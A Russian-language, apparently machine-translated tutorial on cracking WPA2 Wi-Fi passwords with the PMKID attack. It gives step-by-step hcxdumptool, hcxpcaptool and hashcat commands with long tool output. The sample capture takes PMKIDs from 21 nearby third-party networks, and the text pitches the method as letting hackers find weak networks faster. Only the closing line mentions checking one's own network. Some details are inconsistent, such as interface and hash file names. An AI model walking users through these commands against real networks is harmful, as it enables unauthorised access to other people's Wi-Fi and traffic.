Взлом Wi-Fi: новый метод перехвата паролей WPA2 с помощью Hashcat
Форсайт
Взлом паролей с безопасностью WPA2 оставался однообразным очень много времени. Но новому методу требуется меньше информации и это позволяет нацеливаться на точки доступа без подключения к ним. Эта атака использует Hashcat для взлома WPA паролей и позволяет хакерам находить сети с уязвимыми паролями гораздо быстрее.

Новый метод взлома
Вместо того, чтобы полагаться на перехват двусторонней связи между устройствами Wi-Fi для попытки взлома пароля, можно напрямую связаться с уязвимой точкой доступа, используя новый метод. В сообщении на форуме Hashcat подробно рассказывалось о новом методе, использующем атаку против надежного информационного элемента сети безопасности одного кадра EAPOL для сбора необходимой информации для попытки атаки методом перебора.
Подобно предыдущим атакам на WPA, злоумышленник должен находиться в непосредственной близости от сети, которую он хочет атаковать. Цель будет заключаться в использовании Kali-совместимого беспроводного сетевого адаптера для сбора информации, необходимой из сети, для попытки перебора пароля. Вместо того, чтобы использовать Aireplay-ng или Aircrack-ng, мы будем использовать новый инструмент для беспроводной атаки, который называется hcxtools.
Использование Hcxtools и Hashcat
Hcxdumptool и hcxpcaptool - это инструменты, написанные для аудита Wi-Fi и тестирования на проникновение.
Они позволяют нам взаимодействовать с сетями Wi-Fi для захвата рукопожатий WPA и хешей PMKID.
После захвата PMKID следующим шагом является загрузка хеша в Hashcat и попытка взломать пароль. В этом отличие hcxtools от Besside-ng в том, что для подготовки файла для использования Hashcat необходим шаг преобразования. Мы будем использовать hcxpcaptool для преобразования нашего файла PCAPNG в один Hashcat, с которым можно работать, оставляя только шаг выбора надежного списка паролей для ваших попыток перебора.
Стоит отметить, что не каждая сеть уязвима для этой атаки. Поскольку это необязательное поле, добавляемое некоторыми производителями, вы не должны ожидать универсального успеха с этой техникой. Возможность захвата PMKID зависит от того, сделал ли вам производитель точки доступа пользу от включения элемента, который включает его, и от того, сможете ли вы взломать захваченный PMKID, зависит от того, содержится ли базовый пароль в вашем переборе. список паролей. Если какое-либо условие не будет выполнено, эта атака потерпит неудачу.
Что вам понадобится
Чтобы попробовать эту атаку, вам нужно будет запустить Kali Linux и иметь доступ к адаптеру беспроводной сети, который поддерживает режим мониторинга и внедрение пакетов. У нас есть несколько советов по выбору совместимого адаптера беспроводной сети ниже.
Помимо Kali-совместимого сетевого адаптера, убедитесь, что вы полностью обновили и обновили свою систему. Если вы этого не сделаете, некоторые пакеты могут быть устаревшими и вызывать проблемы при захвате.
Установка Hcxtools и Hashcat
Сначала мы установим нужные нам инструменты. Для загрузки введите следующее в окне терминала.
git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make make install
Когда установка закончится, мы перейдем к установке hxctools. Для этого откройте окно терминала и вставьте следующую строку. Если вы получили ошибку, попробуйте ввести sudo перед командой.
Наконец, нам нужно установить Hashcat. Это должно быть легко, так как он включен в репозиторий Kali Linux по умолчанию. Просто введите следующее:
apt install hashcat
После этого мы можем перейти к настройке адаптера беспроводной сети.
Подготовка адаптера
После подключения вашего Kali-совместимого сетевого адаптера, вы можете найти имя, набрав ifconfig или ip a.
Как правило, он будет назван как-то как wlan0.
Первым шагом будет перевод карты в режим беспроводного монитора, что позволит нам прослушивать трафик Wi-Fi в непосредственной близости. Для этого введите в окне терминала следующую команду, подставив вместо имени беспроводного сетевого адаптера имя wlan0.
airmon-ng start wlan0
Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Теперь у вашего адаптера должно быть имя типа «wlan0mon», и он должен находиться в режиме мониторинга. Вы можете подтвердить это, запустив ifconfig снова.
Использование Hxcdump для захвата PMKIDs из локальных сетей
Теперь мы готовы захватить PMKID устройств, которые мы хотим атаковать. С нашим беспроводным сетевым адаптером в режиме мониторинга под названием «wlan1mon» мы введем следующую команду, чтобы начать атаку.
hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1
-i сообщает программе, какой интерфейс мы используем.
В данном случае, wlan1mon.
Имя файла, в который мы будем сохранять результаты, можно указать с помощью аргумента -o flag. Канал, по которому мы хотим сканировать, может быть обозначен флагом -c, за которым следует номер канала для сканирования. В нашей команде выше мы используем wlan1mon для сохранения захваченных PMKID в файл с именем "galleria.pcapng".
Несмотря на то, что вы можете указать другое значение статуса, я не смог захватить ни одно значение, кроме 1.
warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE:...............: wlan1mon FILTERLIST...............: 0 entries MAC CLIENT...............: fcc233ca8bc5 MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62439 ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
Когда вы соберете достаточно, вы можете остановить программу, набрав Ctrl-C.
Это должно привести к созданию файла PCAPNG, содержащего информацию, которая нам необходима для попытки атаки, но нам нужно будет преобразовать его в формат, понятный Hashcat.
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
Эта команда говорит hxcpcaptool использовать информацию, включенную в файл, чтобы помочь Hashcat понять ее с флагами -E, -I и -U. Флаг -Z используется для имени вновь преобразованного файла, который будет использовать Hashcat, а последняя часть команды - это файл PCAPNG, который мы хотим преобразовать.
Выполнение команды должно показать нам следующее.
summary: -------- file name....................: galleria.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.18.0-kali2-amd64 file application information.: hcxdumptool 4.2.1 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 1089 skipped packets..............: 0 packets with GPS data........: 0 packets with FCS.............: 732 beacons (with ESSID inside)..: 49 probe requests...............: 26 probe responses..............: 40 association requests.........: 103 association responses........: 204 reassociation requests.......: 2 reassocaition responses......: 7 authentications (OPEN SYSTEM): 346 authentications (BROADCOM)...: 114 authentications (APPLE)......: 1 EAPOL packets................: 304 EAPOL PMKIDs.................: 21 best handshakes..............: 4 (ap-less: 1) 21 PMKID(s) written to galleriahC.16800
Здесь мы видим, что за короткий промежуток времени мы собрали 21 PMKID.
Теперь мы можем использовать файл «galleriaHC.16800» в Hashcat, чтобы попытаться взломать сетевые пароли.
Выбор списка паролей и перебор с помощью Hashcat
Чтобы начать атаковать захваченные нами хэши, нам нужно выбрать хороший список паролей.
В коллекции SecList вы можете найти несколько хороших списков паролей. Получив список, поместите его в ту же папку, что и только что преобразованный файл .16800, а затем выполните следующую команду в окне терминала.
hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'
В этой команде мы запускаем Hashcat в режиме 16800, который предназначен для атаки на сетевые протоколы WPA-PMKID-PBKDF2.
Далее мы укажем имя файла, который мы хотим взломать, в данном случае «galleriaHC.16800». Флаг -a указывает нам, какие типы атак использовать, в данном случае «прямую» атаку, а затем флаги -w и --kernel-accel = 1 указывают профиль рабочей нагрузки с наивысшей производительностью. Если у вашего компьютера проблемы с производительностью, вы можете уменьшить число в аргументе -w.
Далее, опция --force игнорирует любые предупреждения о продолжении атаки, а последняя часть команды указывает список паролей, который мы используем, чтобы попытаться перебить форсированные PMKID в нашем файле, в данном случае называемом «topwifipass».txt."
hashcat (v4.2.1) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU Hashes: 21 digests; 21 unique digests, 20 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll' Dictionary cache hit: * Filename..: topwifipass.txt * Passwords.: 4801 * Bytes.....: 45277 * Keyspace..: 4801 [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
В зависимости от скорости вашего оборудования и размера списка паролей, это может занять некоторое время. Чтобы увидеть статус в любое время, вы можете нажать клавишу S для обновления.
Результат
Когда Hashcat крашнется, вы сможете проверить прогресс, чтобы увидеть, были ли восстановлены какие-либо ключи.
Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: galleriaHC.16800 Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs) Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress.........: 30180/96020 (31.43%) Rejected.........: 0/30180 (0.00%) Restore.Point....: 1508/4801 (31.41%) Candidates.#1....: peter123 -> moneyman HWon.Dev.#1......: N/A [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Session..........: hashcat Status...........: Running Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: galleriaHC.16800 Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs) Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress.........: 76736/96020 (79.92%) Rejected.........: 0/76736 (0.00%) Restore.Point....: 3836/4801 (79.90%) Candidates.#1....: monopoli -> mercenary HWon.Dev.#1......: N/A [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Когда список паролей приближается к концу, Hashcat автоматически отрегулирует рабочую нагрузку и предоставит вам окончательный отчет, когда он будет завершен.
Approaching final keyspace - workload adjusted. Session..........: hashcat Status...........: Exhausted Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: hotspotcap.16800 Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs) Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts Progress.........: 9602/9602 (100.0%) Rejected.........: 2/9602 (0.02%) Restore.Point....: 4801/4801 (100.0%) Candidates.#1....: 159159159 -> 00001111 HWon.Dev.#1......: N/A Started: Sun Oct 28 18:05:56 2018 Stopped: Sun Oct 28 18:09:49 2018
Если вам удалось взломать какие-либо пароли, вы увидите их здесь.
Атака PMKID Hashcat облегчает атаки Wi-Fi
Если ваша сеть даже не поддерживает надежный элемент безопасности, содержащий PMKID, у этой атаки нет шансов на успех. Вы можете проверить свою собственную сеть с помощью hcxtools, чтобы увидеть, подвержена ли она этой атаке.